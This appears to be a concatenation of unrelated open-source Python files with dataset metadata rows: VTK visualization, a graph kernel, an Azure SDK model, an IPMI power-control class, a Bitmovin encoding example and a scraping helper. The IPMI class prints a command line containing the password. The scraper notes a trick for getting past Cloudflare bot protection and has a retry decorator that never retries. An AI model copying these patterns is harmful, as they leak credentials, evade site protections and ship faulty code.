# search the file until an array called TIME_LATE is found
while file.readline()[:9] != "TIME_LATE":
pass
# Create the corresponding float array
timeLate = vtk.vtkFloatArray()
timeLate.SetName("TIME_LATE")
# Read the values
for i in range(0, numLines):
val = getNumberFromLine(file.readline())
for j in range(0, 8):
timeLate.InsertNextValue(val[j])
# Add the array
fieldData.AddArray(timeLate)
# MONTHLY_PAYMENT - independent variable
while file.readline()[:15] != "MONTHLY_PAYMENT":
pass
monthlyPayment = vtk.vtkFloatArray()
monthlyPayment.SetName("MONTHLY_PAYMENT")
for i in range(0, numLines):
val = getNumberFromLine(file.readline())
for j in range(0, 8):
monthlyPayment.InsertNextValue(val[j])
fieldData.AddArray(monthlyPayment)
# UNPAID_PRINCIPLE - skip
while file.readline()[:16] != "UNPAID_PRINCIPLE":
pass
for i in range(0, numLines):
file.readline()
# LOAN_AMOUNT - skip
while file.readline()[:11] != "LOAN_AMOUNT":
pass
for i in range(0, numLines):
file.readline()
# INTEREST_RATE - independent variable
while file.readline()[:13] != "INTEREST_RATE":
pass
interestRate = vtk.vtkFloatArray()
interestRate.SetName("INTEREST_RATE")
for i in range(0, numLines):
val = getNumberFromLine(file.readline())
for j in range(0, 8):
interestRate.InsertNextValue(val[j])
fieldData.AddArray(interestRate)
# MONTHLY_INCOME - independent variable
while file.readline()[:14] != "MONTHLY_INCOME":
pass
monthlyIncome = vtk.vtkFloatArray()
monthlyIncome.SetName("MONTHLY_INCOME")
for i in range(0, numLines):
val = getNumberFromLine(file.readline())
for j in range(0, 8):
monthlyIncome.InsertNextValue(val[j])
fieldData.AddArray(monthlyIncome)
# Arrange to call the parsing function when the programmable data
# source is executed.
dos.SetExecuteMethod(parseFile)
# Create the dataset.
# DataObjectToDataSetFilter can create geometry using fields from
# DataObject's FieldData
do2ds = vtk.vtkDataObjectToDataSetFilter()
do2ds.SetInputConnection(dos.GetOutputPort())
# We are generating polygonal data
do2ds.SetDataSetTypeToPolyData()
do2ds.DefaultNormalizeOn()
# All we need is points. Assign them.
do2ds.SetPointComponent(0, xAxis, 0)
do2ds.SetPointComponent(1, yAxis, 0)
do2ds.SetPointComponent(2, zAxis, 0)
# RearrangeFields is used to move fields between DataObject's
# FieldData, PointData and CellData.
rf = vtk.vtkRearrangeFields()
rf.SetInputConnection(do2ds.GetOutputPort())
# Add an operation to "move TIME_LATE from DataObject's FieldData to
# PointData"
rf.AddOperation("MOVE", scalar, "DATA_OBJECT", "POINT_DATA")
# Force the filter to execute. This is need to force the pipeline
# to execute so that we can find the range of the array TIME_LATE
rf.Update()
# Set max to the second (GetRange returns [min,max]) of the "range of the
# array called scalar in the PointData of the output of rf"
max = rf.GetOutput().GetPointData().GetArray(scalar).GetRange()[1]
# Use an ArrayCalculator to normalize TIME_LATE
calc = vtk.vtkArrayCalculator()
calc.SetInputConnection(rf.GetOutputPort())
# Working on point data
calc.SetAttributeModeToUsePointData()
# Map scalar to s. When setting function, we can use s to
# represent the array scalar (TIME_LATE)
calc.AddScalarVariable("s", scalar, 0)
# Divide scalar by max (applies division to all components of the array)
calc.SetFunction("s / %f"%max)
# The output array will be called resArray
calc.SetResultArrayName("resArray")
# Use AssignAttribute to make resArray the active scalar field
aa = vtk.vtkAssignAttribute()
aa.SetInputConnection(calc.GetOutputPort())
aa.Assign("resArray", "SCALARS", "POINT_DATA")
aa.Update()
# construct pipeline for original population
# GaussianSplatter -> Contour -> Mapper -> Actor
popSplatter = vtk.vtkGaussianSplatter()
popSplatter.SetInputConnection(aa.GetOutputPort())
popSplatter.SetSampleDimensions(50, 50, 50)
popSplatter.SetRadius(0.05)
popSplatter.ScalarWarpingOff()
popSurface = vtk.vtkContourFilter()
popSurface.SetInputConnection(popSplatter.GetOutputPort())
popSurface.SetValue(0, 0.01)
popMapper = vtk.vtkPolyDataMapper()
popMapper.SetInputConnection(popSurface.GetOutputPort())
popMapper.ScalarVisibilityOff()
popActor = vtk.vtkActor()
popActor.SetMapper(popMapper)
popActor.GetProperty().SetOpacity(0.3)
popActor.GetProperty().SetColor(.9, .9, .9)
# This is for decoration only.
def CreateAxes():
global xAxis, yAxis, zAxis, popSplatter
# Create axes.
popSplatter.Update()
bounds = popSplatter.GetOutput().GetBounds()
axes = vtk.vtkAxes()
axes.SetOrigin(bounds[0], bounds[2], bounds[4])
axes.SetScaleFactor(popSplatter.GetOutput().GetLength()/5.0)
axesTubes = vtk.vtkTubeFilter()
axesTubes.SetInputConnection(axes.GetOutputPort())
axesTubes.SetRadius(axes.GetScaleFactor()/25.0)
axesTubes.SetNumberOfSides(6)
axesMapper = vtk.vtkPolyDataMapper()
axesMapper.SetInputConnection(axesTubes.GetOutputPort())
axesActor = vtk.vtkActor()
axesActor.SetMapper(axesMapper)
# Label the axes.
XText = vtk.vtkVectorText()
XText.SetText(xAxis)
XTextMapper = vtk.vtkPolyDataMapper()
XTextMapper.SetInputConnection(XText.GetOutputPort())
XActor = vtk.vtkFollower()
XActor.SetMapper(XTextMapper)
XActor.SetScale(0.02, .02, .02)
XActor.SetPosition(0.35, -0.05, -0.05)
XActor.GetProperty().SetColor(0, 0, 0)
YText = vtk.vtkVectorText()
YText.SetText(yAxis)
YTextMapper = vtk.vtkPolyDataMapper()
YTextMapper.SetInputConnection(YText.GetOutputPort())
YActor = vtk.vtkFollower()
YActor.SetMapper(YTextMapper)
YActor.SetScale(0.02, .02, .02)
YActor.SetPosition(-0.05, 0.35, -0.05)
YActor.GetProperty().SetColor(0, 0, 0)
ZText = vtk.vtkVectorText()
ZText.SetText(zAxis)
ZTextMapper = vtk.vtkPolyDataMapper()
ZTextMapper.SetInputConnection(ZText.GetOutputPort())
ZActor = vtk.vtkFollower()
ZActor.SetMapper(ZTextMapper)
ZActor.SetScale(0.02, .02, .02)
ZActor.SetPosition(-0.05, -0.05, 0.35)
ZActor.GetProperty().SetColor(0, 0, 0)
return axesActor, XActor, YActor, ZActor
axesActor, XActor, YActor, ZActor = CreateAxes()
# Create the render window, renderer, interactor
ren = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren)
renWin.SetWindowName("vtk - Field Data")
renWin.SetSize(500, 500)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
# Add the actors to the renderer, set the background and size
ren.AddActor(axesActor)
ren.AddActor(XActor)
ren.AddActor(YActor)
ren.AddActor(ZActor)
ren.AddActor(popActor)
ren.SetBackground(1, 1, 1)
# Set the default camera position
camera = vtk.vtkCamera()
camera.SetClippingRange(.274, 13.72)
camera.SetFocalPoint(0.433816, 0.333131, 0.449)
camera.SetPosition(-1.96987, 1.15145, 1.49053)
camera.SetViewUp(0.378927, 0.911821, 0.158107)
ren.SetActiveCamera(camera)
# Assign the camera to the followers.
XActor.SetCamera(camera)
YActor.SetCamera(camera)
ZActor.SetCamera(camera)
iren.Initialize()
renWin.Render()
iren.Start()
| bsd-3-clause | -383,774,845,512,799,740 | 29.492908 | 73 | 0.695079 | false |
nickgentoo/scikit-learn-graph | skgraph/kernel/WLOrthoGraphKernel.py | 1 | 15954 | # -*- coding: utf-8 -*-
"""
Created on Fri Jul 3 12:04:44 2015
Copyright 2015 Nicolo' Navarin
This file is part of scikit-learn-graph.
scikit-learn-graph is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
scikit-learn-graph is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with scikit-learn-graph. If not, see <http://www.gnu.org/licenses/>.
The code is from the following source.
Weisfeiler_Lehman graph kernel.
Python implementation of Nino Shervashidze Matlab code at:
http://mlcb.is.tuebingen.mpg.de/Mitarbeiter/Nino/Graphkernels/
Author : Sandro Vega Pons
License:
"""
import numpy as np
import networkx as nx
import copy
import math
from KernelTools import convert_to_sparse_matrix
from graphKernel import GraphKernel
from scipy.sparse import dok_matrix
from sklearn import preprocessing as pp
class WLOrthoGraphKernel(GraphKernel):
"""
Weisfeiler_Lehman graph kernel.
"""
def __init__(self, r = 1, normalization = False):
self.h=r
self.normalization=normalization
self.__startsymbol='!' #special symbols used in encoding
self.__conjsymbol='#'
self.__endsymbol='?'
self.__fsfeatsymbol='*'
self.__version=0
self.__contextsymbol='@'
def kernelFunction(self, g_1, g_2):
"""Compute the kernel value (similarity) between two graphs.
Parameters
----------
g1 : networkx.Graph
First graph.
g2 : networkx.Graph
Second graph.
h : interger
Number of iterations.
nl : boolean
Whether to use original node labels. True for using node labels
saved in the attribute 'node_label'. False for using the node
degree of each node as node attribute.
Returns
-------
k : The similarity value between g1 and g2.
"""
gl = [g_1, g_2]
return self.computeGrams(gl)[0, 1]
def transform(self, graph_list):
"""
TODO
"""
n = len(graph_list) #number of graphs
# list of the orthogonalized phi: phis[i] is the phi of the i-th iteration of the WL test.
phis=[]
for i in range(self.h+1):
phis.append({})
NodeIdToLabelId = [0] * n # NodeIdToLabelId[i][j] is labelid of node j in graph i
label_lookup = {} #map from features to corresponding id
label_counter = 0 #incremental value for label ids
for i in range(n): #for each graph
NodeIdToLabelId[i] = {}
for j in graph_list[i].nodes(): #for each node
if not label_lookup.has_key(graph_list[i].node[j]['label']):#update label_lookup and label ids from first iteration that consider node's labels
label_lookup[graph_list[i].node[j]['label']] = label_counter
NodeIdToLabelId[i][j] = label_counter
label_counter += 1
else:
NodeIdToLabelId[i][j] = label_lookup[graph_list[i].node[j]['label']]
feature=self.__fsfeatsymbol+str(label_lookup[graph_list[i].node[j]['label']])
if not phis[0].has_key((i,feature)):
phis[0][(i,feature)]=0.0
phis[0][(i,feature)]+=1.0
# here we have phi[0]
### MAIN LOOP
it = 0
NewNodeIdToLabelId = copy.deepcopy(NodeIdToLabelId) #labels id of nex iteration
while it <= self.h: #each iteration compute the next labellings (that are contexts of the previous)
label_lookup = {}
for i in range(n): #for each graph
for j in graph_list[i].nodes(): #for each node, consider its neighbourhood
neighbors=[]
for u in graph_list[i].neighbors(j):
neighbors.append(NodeIdToLabelId[i][u])
neighbors.sort() #sorting neighbours
long_label_string=str(NodeIdToLabelId[i][j])+self.__startsymbol #compute new labels id
for u in neighbors:
long_label_string+=str(u)+self.__conjsymbol
long_label_string=long_label_string[:-1]+self.__endsymbol
if not label_lookup.has_key(long_label_string):
label_lookup[long_label_string] = label_counter
NewNodeIdToLabelId[i][j] = label_counter
label_counter += 1
else:
NewNodeIdToLabelId[i][j] = label_lookup[long_label_string]
feature=self.__fsfeatsymbol+str(NewNodeIdToLabelId[i][j])
if not phis[it].has_key((i,feature)):
phis[it][(i,feature)]=0.0
phis[it][(i,feature)]+=1.0
# here we have phi[it]
NodeIdToLabelId = copy.deepcopy(NewNodeIdToLabelId) #update current labels id
it = it + 1
ves = [convert_to_sparse_matrix(phi) for phi in phis]
if self.normalization:
ves = [pp.normalize(ve, norm='l2', axis=1) for ve in ves]
return ves
# def transform(self, graph_list):
# """
# TODO
# """
# n = len(graph_list) #number of graphs
#
# phi={} #dictionary representing the phi vector for each graph. phi[r][c]=v each row is a graph. each column is a feature
#
# NodeIdToLabelId = [dict() for x in range(n)] # NodeIdToLabelId[i][j] is labelid of node j in graph i
# label_lookup = {} #map from features to corresponding id
# label_counter = long(1) #incremental value for label ids
#
# for i in range(n): #for each graph
# #NodeIdToLabelId[i] = {}
# #nx.draw(graph_list[i])
#
#
# for j in graph_list[i].nodes(): #for each node
# if not label_lookup.has_key(graph_list[i].node[j]['label']):#update label_lookup and label ids from first iteration that consider node's labels
# label_lookup[graph_list[i].node[j]['label']] = label_counter
# NodeIdToLabelId[i][j] = label_counter
# label_counter += 1
# else:
# NodeIdToLabelId[i][j] = label_lookup[graph_list[i].node[j]['label']]
#
# feature=self.__fsfeatsymbol+str(label_lookup[graph_list[i].node[j]['label']])
# if not phi.has_key((i,feature)):
# phi[(i,feature)]=0.0
# phi[(i,feature)]+=1.0
#
# ### MAIN LOOP
# it = 0
# NewNodeIdToLabelId = copy.deepcopy(NodeIdToLabelId) #labels id of nex iteration
#
# while it < self.h: #each iteration compute the next labellings (that are contexts of the previous)
# label_lookup = {}
#
# for i in range(n): #for each graph
# for j in graph_list[i].nodes(): #for each node, consider its neighbourhood
# neighbors=[]
# for u in graph_list[i].neighbors(j):
# neighbors.append(NodeIdToLabelId[i][u])
# neighbors.sort() #sorting neighbours
#
# long_label_string=str(NodeIdToLabelId[i][j])+self.__startsymbol #compute new labels id
# for u in neighbors:
# long_label_string+=str(u)+self.__conjsymbol
# long_label_string=long_label_string[:-1]+self.__endsymbol
#
# if not label_lookup.has_key(long_label_string):
# label_lookup[long_label_string] = label_counter
# NewNodeIdToLabelId[i][j] = label_counter
# label_counter += 1
# else:
# NewNodeIdToLabelId[i][j] = label_lookup[long_label_string]
#
# feature=self.__fsfeatsymbol+str(NewNodeIdToLabelId[i][j])
# if not phi.has_key((i,feature)):
# phi[(i,feature)]=0.0
# phi[(i,feature)]+=1.0
#
#
# NodeIdToLabelId = copy.deepcopy(NewNodeIdToLabelId) #update current labels id
# it = it + 1
# #print phi
# return convert_to_sparse_matrix(phi)
# def transform(self, graph_list):
# """
# TODO
# """
# n = len(graph_list) #number of graphs
#
# phi={} #dictionary representing the phi vector for each graph. phi[r][c]=v each row is a graph. each column is a feature
# #phi=dok_matrix()
# NodeIdToLabelId = [0] * n # NodeIdToLabelId[i][j] is labelid of node j in graph i
# label_lookup = {} #map from features to corresponding id
# label_counter = 0 #incremental value for label ids
#
# for i in xrange(n): #for each graph
# NodeIdToLabelId[i] = {}
#
# for j in graph_list[i].nodes():
# enc=graph_list[i].node[j]['label'] #"0"+
# if enc not in label_lookup:#update label_lookup and label ids
# label_lookup[enc] = label_counter
# NodeIdToLabelId[i][j] = label_counter
# label_counter += 1
# else:
# NodeIdToLabelId[i][j] = label_lookup[enc]
# #print enc, label_lookup[enc]
# if (i,label_lookup[enc]) not in phi:
# phi[i,label_lookup[enc]]=0
# phi[i,label_lookup[enc]]+=1
#
# ### MAIN LOOP
# it = 0
# NewNodeIdToLabelId = copy.deepcopy(NodeIdToLabelId)
# #label_lookup = {}
#
# while it < self.h:
# label_lookup = {}
#
# for i in xrange(n): #for each graph
# for j in graph_list[i].nodes(): #for each node, consider its neighbourhood
# neighbors=[]
# for u in graph_list[i].neighbors(j):
# #print u,
# neighbors.append(NodeIdToLabelId[i][u])
# neighbors.sort()
# #print
# long_label_string=str(NodeIdToLabelId[i][j])#str(it+1)+self.__startsymbol+
# for u in neighbors:
# long_label_string+=self.__conjsymbol+str(u)
# #long_label_string=long_label_string[:-1]+self.__endsymbol
# if long_label_string not in label_lookup:
# label_lookup[long_label_string] = label_counter
# NewNodeIdToLabelId[i][j] = label_counter
# label_counter += 1
# else:
# NewNodeIdToLabelId[i][j] = label_lookup[long_label_string]
# print long_label_string, NewNodeIdToLabelId[i][j]
#
# if (i,NewNodeIdToLabelId[i][j]) not in phi:
# phi[i,NewNodeIdToLabelId[i][j]]=0
# phi[i,NewNodeIdToLabelId[i][j]]+=1
#
# NodeIdToLabelId = copy.deepcopy(NewNodeIdToLabelId)
# it = it + 1
# #return dok_matrix(phi.todense()).tocsr()
# return convert_to_sparse_matrix(phi)
# def transform(self, graph_list):
# """
# TODO
# """
# n = len(graph_list) #number of graphs
#
# phi={} #dictionary representing the phi vector for each graph. phi[r][c]=v each row is a graph. each column is a feature
#
# NodeIdToLabelId = [0] * n # NodeIdToLabelId[i][j] is labelid of node j in graph i
# label_lookup = {} #map from features to corresponding id
# label_counter = 1 #incremental value for label ids
#
# for i in range(n): #for each graph
# NodeIdToLabelId[i] = {}
#
# for j in graph_list[i].nodes():
# #print graph_list[i].node[j]['label']
# if not label_lookup.has_key("0|"+str(graph_list[i].node[j]['label'])):#update label_lookup and label ids
# label_lookup["0|"+str(graph_list[i].node[j]['label'])] = label_counter
# NodeIdToLabelId[i][j] = label_counter
# label_counter += 1
# else:
# NodeIdToLabelId[i][j] = label_lookup["0|"+str(graph_list[i].node[j]['label'])]
#
# if not phi.has_key((i,label_lookup["0|"+str(graph_list[i].node[j]['label'])])):
# phi[(i,label_lookup["0|"+str(graph_list[i].node[j]['label'])])]=0
# phi[(i,label_lookup["0|"+str(graph_list[i].node[j]['label'])])]+=1
#
# ### MAIN LOOP
# it = 0
# NewNodeIdToLabelId = copy.deepcopy(NodeIdToLabelId)
# #NewNodeIdToLabelId =[0] * n
# while it < self.h:
# label_lookup = {}
#
# for i in range(n): #for each graph
# for j in graph_list[i].nodes(): #for each node, consider its neighbourhood
# neighbors=[]
# for u in graph_list[i].neighbors(j):
# #print u
# neighbors.append(NodeIdToLabelId[i][u])
# neighbors.sort()
# if len(neighbors)==0:
# print "Empty neighbors"
# #MODIFICATO RISPETTO a TESSELLI str(it)+self.__startsymbol+
# long_label_string=str(it+1)+"|"+str(NodeIdToLabelId[i][j])+self.__startsymbol
# for u in neighbors:
# long_label_string+=str(u)+self.__conjsymbol
# #long_label_string=long_label_string[:-1]+self.__endsymbol
# long_label_string=long_label_string[:-1]+self.__endsymbol
#
# if len(neighbors)==0:
# print long_label_string
#
# if not label_lookup.has_key(long_label_string):
# label_lookup[long_label_string] = label_counter
# NewNodeIdToLabelId[i][j] = label_counter
# label_counter += 1
# else:
# NewNodeIdToLabelId[i][j] = label_lookup[long_label_string]
#
# if not phi.has_key((i,NewNodeIdToLabelId[i][j])):
# phi[(i,NewNodeIdToLabelId[i][j])]=0
# phi[(i,NewNodeIdToLabelId[i][j])]+=1
#
# NodeIdToLabelId = copy.deepcopy(NewNodeIdToLabelId)
# it = it + 1
# return convert_to_sparse_matrix(phi)
# def __normalization(self, gram):
# """
# TODO
# """
# if self.normalization:
# diagonal=np.diag(gram)
# a=np.tile(diagonal,(gram.shape[0],1))
# b=diagonal.reshape((gram.shape[0],1))
# b=np.tile(b,(1,gram.shape[1]))
#
# return gram/np.sqrt(a*b)
# else :
# return gram
def computeKernelMatrixTrain(self,Graphs):
return self.computeGrams(Graphs)
def computeGrams(self,g_it,ps=None):
if ps is None:
ps=self.transform(g_it)
return [precomputed.dot(precomputed.T).todense().tolist() for precomputed in ps]
| gpl-3.0 | 6,825,893,100,655,079,000 | 41.772118 | 160 | 0.521938 | false |
Azure/azure-sdk-for-python | sdk/cognitiveservices/azure-cognitiveservices-language-textanalytics/azure/cognitiveservices/language/textanalytics/models/document_statistics.py | 1 | 1220 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class DocumentStatistics(Model):
"""DocumentStatistics.
:param characters_count: Number of text elements recognized in the
document.
:type characters_count: int
:param transactions_count: Number of transactions for the document.
:type transactions_count: int
"""
_attribute_map = {
'characters_count': {'key': 'charactersCount', 'type': 'int'},
'transactions_count': {'key': 'transactionsCount', 'type': 'int'},
}
def __init__(self, **kwargs):
super(DocumentStatistics, self).__init__(**kwargs)
self.characters_count = kwargs.get('characters_count', None)
self.transactions_count = kwargs.get('transactions_count', None)
| mit | 2,335,371,021,633,898,500 | 35.969697 | 76 | 0.605738 | false |
stroucki/tashi | src/zoni/hardware/ipmi.py | 2 | 3580 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# $Id$
#
import subprocess
import logging
from systemmanagementinterface import SystemManagementInterface
#class systemmagement():
#def __init__(self, proto):
#self.proto = proto
class Ipmi(SystemManagementInterface):
def __init__(self, config, nodeName, hostInfo):
# should send data obj instead of hostInfo
self.config = config
self.nodeName = nodeName + "-ipmi"
self.password = hostInfo['ipmi_password']
self.user = hostInfo['ipmi_user']
self.powerStatus = None
self.verbose = False
self.log = logging.getLogger(__name__)
self.ipmicmd = "ipmitool -I lanplus -U %s -H %s -P %s " % (self.user, self.nodeName, self.password)
print self.ipmicmd
def setVerbose(self, verbose):
self.verbose = verbose
def __executeCmd(self, cmd):
a = subprocess.Popen(args=cmd.split(), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
out= a.stdout.readline()
err = a.stderr.readline()
if self.verbose:
print "out is ", out
print "err is ", err
if err:
self.log.info("%s %s" % (self.nodeName, err))
return -1
self.log.info("%s %s" % (self.nodeName, out))
return 1
def __setPowerStatus(self):
if self.verbose:
print self.ipmicmd
cmd = self.ipmicmd + "chassis power status"
a = subprocess.Popen(args=cmd.split(), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
output = a.stdout.readline()
myerr = a.stderr.readline()
if "off" in output:
self.powerStatus = 0
if "on" in output:
self.powerStatus = 1
if "Unable" in myerr:
self.powerStatus = -1
return output
def isPowered(self):
if self.powerStatus == None:
self.__setPowerStatus()
self.log.info("Hardware get power status : %s", self.powerStatus)
return self.powerStatus
def getPowerStatus(self):
#self.log.info("getPowerStatus :%s" % self.nodeName)
return self.isPowered()
def powerOn(self):
self.log.info("Hardware power on : %s", self.nodeName)
cmd = self.ipmicmd + "chassis power on"
return self.__executeCmd(cmd)
def powerOff(self):
self.log.info("Hardware power off : %s", self.nodeName)
cmd = self.ipmicmd + "chassis power off"
return self.__executeCmd(cmd)
def powerOffSoft(self):
self.log.info("Hardware power off (soft): %s", self.nodeName)
cmd = self.ipmicmd + "chassis power soft"
return self.__executeCmd(cmd)
def powerCycle(self):
self.log.info("Hardware power cycle : %s", self.nodeName)
cmd = self.ipmicmd + "chassis power cycle"
return self.__executeCmd(cmd)
def powerReset(self):
self.log.info("Hardware power reset : %s", self.nodeName)
cmd = self.ipmicmd + "chassis power reset"
return self.__executeCmd(cmd)
def activateConsole(self):
self.log.info("Hardware sol activate : %s", self.nodeName)
cmd = self.ipmicmd + "sol activate"
return self.__executeCmd(cmd)
| apache-2.0 | 2,151,156,001,504,405,200 | 29.084034 | 101 | 0.705866 | false |
bitmovin/bitmovin-python | examples/encoding/create_mp4_encoding_with_stream_metadata.py | 1 | 5198 | import datetime
from bitmovin import Bitmovin, Encoding, HTTPSInput, H264CodecConfiguration, \
AACCodecConfiguration, H264Profile, StreamInput, SelectionMode, Stream, EncodingOutput, ACLEntry, ACLPermission, \
MuxingStream, CloudRegion, MP4Muxing, S3Output
from bitmovin.errors import BitmovinError
from bitmovin.resources.models.encodings.stream_metadata import StreamMetadata
API_KEY = '<INSERT_YOUR_API_KEY>'
# https://<INSERT_YOUR_HTTP_HOST>/<INSERT_YOUR_HTTP_PATH>
HTTPS_INPUT_HOST = '<INSERT_YOUR_HTTPS_HOST>'
HTTPS_INPUT_PATH = '<INSERT_YOUR_HTTPS_PATH>'
S3_OUTPUT_ACCESSKEY = '<INSERT_YOUR_ACCESS_KEY>'
S3_OUTPUT_SECRETKEY = '<INSERT_YOUR_SECRET_KEY>'
S3_OUTPUT_BUCKETNAME = '<INSERT_YOUR_BUCKET_NAME>'
date_component = datetime.datetime.now().strftime('%Y-%m-%dT%H-%M-%S')
OUTPUT_BASE_PATH = 'your/output/base/path/{}/'.format(date_component)
bitmovin = Bitmovin(api_key=API_KEY)
encoding_profiles = [dict(height=240, bitrate=400000, fps=None),
dict(height=360, bitrate=800000, fps=None),
dict(height=480, bitrate=1200000, fps=None),
dict(height=720, bitrate=2400000, fps=None),
dict(height=1080, bitrate=4800000, fps=None)]
def main():
https_input = HTTPSInput(name='create_simple_encoding HTTPS input', host=HTTPS_INPUT_HOST)
https_input = bitmovin.inputs.HTTPS.create(https_input).resource
s3_output = S3Output(access_key=S3_OUTPUT_ACCESSKEY,
secret_key=S3_OUTPUT_SECRETKEY,
bucket_name=S3_OUTPUT_BUCKETNAME,
name='Sample S3 Output')
s3_output = bitmovin.outputs.S3.create(s3_output).resource
encoding = Encoding(name='Python Example - Add StreamMetadata to MP4Muxing',
cloud_region=CloudRegion.GOOGLE_EUROPE_WEST_1)
encoding = bitmovin.encodings.Encoding.create(encoding).resource
video_input_stream = StreamInput(input_id=https_input.id,
input_path=HTTPS_INPUT_PATH,
selection_mode=SelectionMode.AUTO)
audio_input_stream = StreamInput(input_id=https_input.id,
input_path=HTTPS_INPUT_PATH,
selection_mode=SelectionMode.AUTO)
audio_codec_configuration = AACCodecConfiguration(name='example_audio_codec_configuration_english',
bitrate=128000,
rate=48000)
audio_codec_configuration = bitmovin.codecConfigurations.AAC.create(audio_codec_configuration).resource
stream_metadata = StreamMetadata(language='spa')
audio_stream = Stream(codec_configuration_id=audio_codec_configuration.id,
input_streams=[audio_input_stream], name='Sample Stream Audio', metadata=stream_metadata)
audio_stream = bitmovin.encodings.Stream.create(object_=audio_stream,
encoding_id=encoding.id).resource
for profile in encoding_profiles:
video_codec_configuration = H264CodecConfiguration(
name='python_example_mp4muxing_with_metadata_{}p'.format(profile['height']),
bitrate=profile['bitrate'],
rate=profile['fps'],
width=None,
height=profile['height'],
profile=H264Profile.HIGH)
video_codec_configuration = bitmovin.codecConfigurations.H264.create(video_codec_configuration).resource
video_stream = Stream(codec_configuration_id=video_codec_configuration.id,
input_streams=[video_input_stream],
name='Python Example H264 Stream {}p'.format(profile['height']))
video_stream = bitmovin.encodings.Stream.create(object_=video_stream,
encoding_id=encoding.id).resource
create_muxing(encoding, s3_output, video_stream, audio_stream, 'video_audio_{}p.mp4'.format(profile['height']))
bitmovin.encodings.Encoding.start(encoding_id=encoding.id)
try:
bitmovin.encodings.Encoding.wait_until_finished(encoding_id=encoding.id)
except BitmovinError as bitmovin_error:
print('Exception occurred while waiting for encoding to finish: {}'.format(bitmovin_error))
def create_muxing(encoding, output, video_stream, audio_stream, filename):
acl_entry = ACLEntry(permission=ACLPermission.PUBLIC_READ)
video_muxing_output = EncodingOutput(output_id=output.id,
output_path=OUTPUT_BASE_PATH,
acl=[acl_entry])
video_muxing_stream = MuxingStream(video_stream.id)
audio_muxing_stream = MuxingStream(audio_stream.id)
muxing = MP4Muxing(streams=[video_muxing_stream, audio_muxing_stream],
outputs=[video_muxing_output],
filename=filename)
muxing = bitmovin.encodings.Muxing.MP4.create(object_=muxing,
encoding_id=encoding.id).resource
if __name__ == '__main__':
main()
| unlicense | -762,027,933,942,152,000 | 45.410714 | 119 | 0.628896 | false |
georgthegreat/dancebooks-bibtex | scripts/lib.py | 1 | 31786 | #!/usr/bin/env python3
import functools
import http.client
import json
import math
import os
import subprocess
import shutil
import time
import uuid
from xml.etree import ElementTree
import bs4
import opster
import requests
#NOTE: if the website is protected by cloudflare, removing User-Agent header will help to pass it by
USER_AGENT = "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:62.0) Gecko/20100101 Firefox/62.0"
HEADERS = {
"User-Agent": USER_AGENT
}
TIMEOUT = 30
###################
#UTILITY FUNCTIONS
###################
def retry(retry_count, delay=0, delay_backoff=1):
def actual_decorator(func):
@functools.wraps(func)
def do_retry(*args, **kwargs):
retry_number = 0
current_delay = delay
try:
return func(*args, **kwargs)
except Exception:
if retry_number >= retry_count:
raise RuntimeError(f"Failed to get results after {retry_number} retries")
else:
time.sleep(current_delay)
current_delay *= delay_backoff
retry_number += 1
return do_retry
return actual_decorator
#using single session for all requests
session = requests.Session()
#@retry(retry_count=3)
def make_request(*args, **kwargs):
"""
Performs the request and returns requests.Response object.
Accepts both raw urls and prepared requests
"""
if isinstance(args[0], str):
url = args[0]
response = requests.get(*args, headers=HEADERS, timeout=TIMEOUT, **kwargs)
elif isinstance(args[0], requests.Request):
request = args[0].prepare()
url = request.url
args = args[1:]
request.headers = HEADERS
response = session.send(request, *args, timeout=TIMEOUT, **kwargs)
if response.status_code == 200:
return response
else:
raise ValueError(f"While getting {url}: HTTP status 200 was expected. Got {response.status_code}")
#@retry(retry_count=3)
def get_json(*args, **kwargs):
"""
Returns parsed JSON object received via HTTP GET request
"""
return json.loads(make_request(*args, **kwargs).content)
def get_xml(*args, **kwargs):
"""
Returns parsed xml (as ElementTree) received via HTTP GET request
"""
return ElementTree.fromstring(make_request(*args, **kwargs).content)
def get_text(*args, **kwargs):
return make_request(*args, **kwargs).content.decode("utf-8")
def get_binary(output_filename, url_or_request, *args, **kwargs):
"""
Writes binary data received via HTTP GET request to output_filename
Accepts both url as string and request.Requests
"""
BLOCK_SIZE = 4096
response = make_request(url_or_request, *args, stream=True, **kwargs)
with open(output_filename, "wb") as file:
for chunk in response.iter_content(BLOCK_SIZE):
file.write(chunk)
def make_output_folder(downloader, book_id):
folder_name = "{downloader}_{book_id}".format(
downloader=downloader,
book_id=book_id\
.replace('/', '_')
.replace(':', '_')
)
os.makedirs(folder_name, exist_ok=True)
return folder_name
def make_output_filename(base, page=None, extension="bmp"):
result = base
if isinstance(page, int):
result = os.path.join(result, f"{page:08}")
elif page is not None:
result = os.path.join(result, page)
if extension is not None:
result += "." + extension
return result
def make_temporary_folder():
return str(uuid.uuid4())
class TileSewingPolicy(object):
def __init__(self, tiles_number_x, tiles_number_y, tile_size, image_width=None, image_height=None, overlap=None):
self.tiles_number_x = tiles_number_x
self.tiles_number_y = tiles_number_y
self.tile_size = tile_size
self.image_width = image_width
self.image_height = image_height
self.overlap = overlap
@staticmethod
def from_image_size(width, height, tile_size):
